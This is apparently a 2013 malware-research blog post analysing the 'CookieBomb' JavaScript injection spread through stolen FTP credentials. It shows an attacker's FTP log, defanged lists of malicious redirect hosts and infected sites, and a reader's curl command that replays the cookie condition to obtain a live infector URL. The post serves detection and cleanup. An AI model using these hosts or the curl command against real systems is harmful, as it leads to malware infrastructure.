Wednesday, July 17, 2013

Proof of Concept of "CookieBomb" code injection attack

This writing is actually related to the previously blogged: "A mistery of Malware URL "cnt.php" Redirection" here-->>[MMD-Blog], so I warn you.. is not new stuff, but it seems a bit difficult to make some admin to act quickly due to IR of this incident, so me and my fellow coder friend in our group tried to explain how dangerous this threat can be performed in a PoC details.

Accidentally I just handled a rush of malicious JavaScript code injections of similar cases, (without involving htaccess) and these evil code was injected to the html files which mostly are index files, with the code as per below:

This is why I have huge samples of this injection code for this research purpose.

So I collected the latest 30+ codes which I attached in the sample section for the cross analysis purpose for fellow researchers (I put different password for this sharing purpose, DM me in twitter for it):

These code was injected in the index files via FTP account (in all cases I handled) that was leaked/stolen suspected from the malware infection or by FTP bruting, or possibly by "other" vulnerabilities (which can not say it out loud yet, a different issue), with the log (thank's to the great admin who shared this) which suggesting the same auto-injection FTP tool as per previously blogged:

[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="USER xxxxxxxx" B=- S=331
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="PASS (hidden)" B=- S=230
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="SYST" B=- S=215
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="LIST /" D= B=211 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/" D= B=630 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/data/" D= B=124 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="LIST public_html/images/" D= B=1219 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html" F=- B=- S=550 T=-
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="STOR public_html/index.html-1" F=- B=- S=- T=-
Webroot was writing good article about these evil tools which is spotted used in the wild in -->>[HERE] and [HERE]

Let's go back to those injected codes. After decoded, all of these scripts came up with the with the below code, I put some explanation on the codes to grab the same perception for further explanation:

The decoded values of redirection stored in the RANDOM_2_TO_4_CHARS are as per below
(in "masked" urls):

xp.src =    'h00p://valtechnologie.com/support/clik.php';
rr.src =    'h00p://toerkoopweb.nl/diensten/count.php';
p.src =     'h00p://abra-pc.com.br/clik.php';
wenr.src =  'h00p://ueno-hiroshima.main.jp/dtd.php';
nj.src =    'h00p://coleychurch.org.uk/www/cnt.php';
c.src =     'h00p://101.110.149.203/clk.php';
y.src =     'h00p://dv-suedpfalz.de/count.php';
kk.src =    'h00p://spendmetest.com/Services/count.php';
fkhd.src =  'h00p://syasinya-san.sakura.ne.jp/dtd.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
sfv.src =   'h00p://igrejabatista.comze.com/web_media/counter.php';
idqni.src = 'h00p://www.alle-vier.de/clicker.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
vaasr.src = 'h00p://www.thehornybanana.com/_vti_bin/clicker.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
dxbq.src =  'h00p://f2f365.com/counter.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
beb.src =   'h00p://avceldiamante.com/clk.php';
wenr.src =  'h00p://ueno-hiroshima.main.jp/dtd.php';
kmqai.src = 'h00p://96.9.52.103/clik.php';
kk.src =    'h00p://spendmetest.com/Services/count.php';
jpp.src =   'h00p://xeropointventures.com/images/rel.php';
nj.src =    'h00p://coleychurch.org.uk/www/cnt.php';
ve.src =    'h00p://alldesign-jp.fool.jp/counter.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
jpp.src =   'h00p://xeropointventures.com/images/rel.php';
udv.src =   'h00p://ueno-hiroshima.main.jp/dtd.php';
So we have the evil php file-names used as the landing of this redirection as; cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php, and so on. The purpose of this file naming is to camouflage its malicious action from the hacked site owners and the infected victims. The problem is if you access this url directly, it will replies you with the "OK" or other values.

So far, during pointing and cleaning these infections , even though I begged to site admins & owners for the injected code at landing page, still I was not that lucky to have these scripts however we finally understanding this malicious concept.

The concept of Cookie Bomb

I called & tagged this as #CookieBomb concept, it works like this:

The code in the template above means: When a cookie-enabled browser accessing these infected sites, the codes will be executed in JavaScript environment to check whether your browser already have a specific cookie and value , if not then that cookie will be created for you. At the same time, no matter you have the cookie or not you will be redirected to the other site via a hidden IFRAME which will replying you the dull response like below pic:

During the creation of the cookie it will be set the specific values of cookie like: 1) the cookie's (file) name, 2) special variable value, 3) the expiry date, and 4) access path. These are four important values needed for the further process.

After the redirection was made, the PHP or (Java, etc) script (masked as those cnt.php, clk.php, click.php, rel.php, dtd.php, counter.php, clicker.php , and so on..) will "suppose" to check the cookie's values and its etc condition with then execute an "action" upon those condition meets which this "action" is never be good. They can execute another redirection, or a straight infection, depends on the needs of the hacker. Is a simple scheme, it works, and it is deploy-able to the mass automation scheme.

The point of the bad guys doing this is: to delay an infection, to avoid detection and alerts, on the other words: This time you need a cookie under some expiry time as "ticket" for an infection that's why I call this as Cookie Bomb.

Proof Of Concept

well, to talk is easy, proving it is another matter, we tried to make as many PoC of the above infection concept, and it works with the simple PHP code below:

Explanation:
The above PoC code is just an example. If a landing page calls the cookie and meets the same condition with the cookie's value of the previously made in injected-code's site then the malware infection or another attack can be performed. In the example I wrote a direct access to an executable malware file, many implementation of this concept can be applied.

Mitigation

To mitigate this infection case, we can search by Google the below keywords (which can be changed easily by the hackers.. so please be flexible in your greps by using regex):

Or scan it to your web site from local server. And if you find it, please decode to find the destination URL target too, for the both sites need to be cleaned from our beloved internet.
Furthermore, to fight this threat, the FTP log is really our friend for we need to know from which IP address the attack was coming, in my case mostly came from Ukrainian network

How to search this infection?

By understanding the characteristic used by this attack is not that difficult to search the infected page. Google Search or Mr. Keith Makan's GooDork is a very good tools for this purpose. Please see how the automation logic that is used to infect, seeing (1) the cookie created path value of "/" and (2) FTP hack log shown above, we know that mostly the top pages (or the file linked to the top pages like framed top/menu or scrip/css called) are aimed with the reason: the wide infection is targeted by these bad actors. We can just grep the infection string used (look at the one of above pic) and aim your dork canon into your target (ISP or Country based Geo-IP) and you will get the result almost instantly. i.e.; While writing this I was aiming the US' ISP GoDaddy and received the below infected domains which are proved infected to these attack:

h00p://mmcmt.org/
h00p://www.wettndry.com/
h00p://gorillarobotfactory.com/
h00p://dcprevisores.com/
h00p://ip-72-167-99-107.ip.secureserver.net/
h00p://syccoservices.com/
h00p://cdijescolhacerta.casabmse.pt/
h00p://www.iimspublications.com/
h00p://www.shaversandrazor.com/
h00p://www.newlooklaser.ca/
h00p://www.smartageinsurance.com/
h00p://www.jumpshotmedia.com/
h00p://www.wolfetech.com/
h00p://bracapulco.com/
h00p://www.naturalbalancenow.com/
h00p://www.ishojtv.com/
h00p://www.sensorsadvance.com/
h00p://www.newlooklaser.ca/
h00p://bracapulco.com/
h00p://mosaicnarrative.com/
h00p://westonflmovers.com/
h00p://www.1stpagemarketingservices.com/
h00p://2528c.com/
h00p://starlighthca.com/
h00p://billymorganart.com/
h00p://flyxilla.com/
h00p://thinkingknowledge.com/
h00p://www.angelavanegas.com/
h00p://sportingdelights.com/
h00p://scholarlythinking.com/
h00p://limeworks.org/blog/wp-includes/js/comment-repl%3D/
[...]
(some of ↑these may lead to Blackhole Exploit Kit, all are infected w/redir)

Samples

We share the sample injection codes, the decode and PoC to be downloaded from-->>[HERE] for the research purpose and raising the detection ratio of this attack.

Additional

The recent changes in obfuscation (or etc changes) for this attack will be posted in this page-->>[Blog]

This post is dedicated to fellow admins, fellow IR officers who have to work non-stop to clean this threat, and special thank's to our crusader for his great help in proving the concept.

#MalwareMustDie!

7 comments:

  1. Good #PoC to follow the cookie condition to trigger the Bomb via curl command by our crusader:
    http://malwar.org/buscando-um-hobby-e-encontrei-blackhole-xpl-kit/

    He used curl command like this:

    $ curl -vv –cookie “visited_uq=55;expires=Tue, 16 Jul 2013 14:40:07 GMT; path=/” –referer hxxp://www.clubalpino.org –user-agent “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” hxxp://laurendavidstyle.com/print/cnt.php

    It works to get infectors:

    hxxp://changeboxcommunications.com/a24fd24d17281a4b9f7e45df07098970/a.php

    Nice PoC! Salute, ☩Crusader!

    ReplyDelete
    Replies
    1. Latest CookieBombs filenames and masks:

      // filename:

      clicker.php
      esd.php
      relay.php
      cnt.php
      counter.php
      clk.php
      dtd.php
      rel.php
      dot.php
      34.php
      box.php
      net.php
      php5.php
      sys.php
      systems.php
      test.php
      phpinfo.php
      mail.php
      system.php

      // filemask:

      *.html
      *.php
      *.asp
      .htaccess

      Delete
  2. Great PoC. Here are some real life examples using this technique:
    cookie based web malware analysis

    ReplyDelete
  3. I have this on my crap on my website and wonder if there is some easy way to detect were its hidden ? the only panic solution i did was to delete all java-scripts, but the damn thing are crawling back, my site is unreal-mayhem.com

    ReplyDelete
    Replies
    1. did you try a grep -r "e=eval" '/$PATHTOALLFILES'

      Delete
  4. Can anyone please help me out in getting the password for the zip file of 30+ sample attack pattern text files

    ReplyDelete
    Replies
    1. ping me in twitter > @malwaremustdie , and I will DM it.

      Delete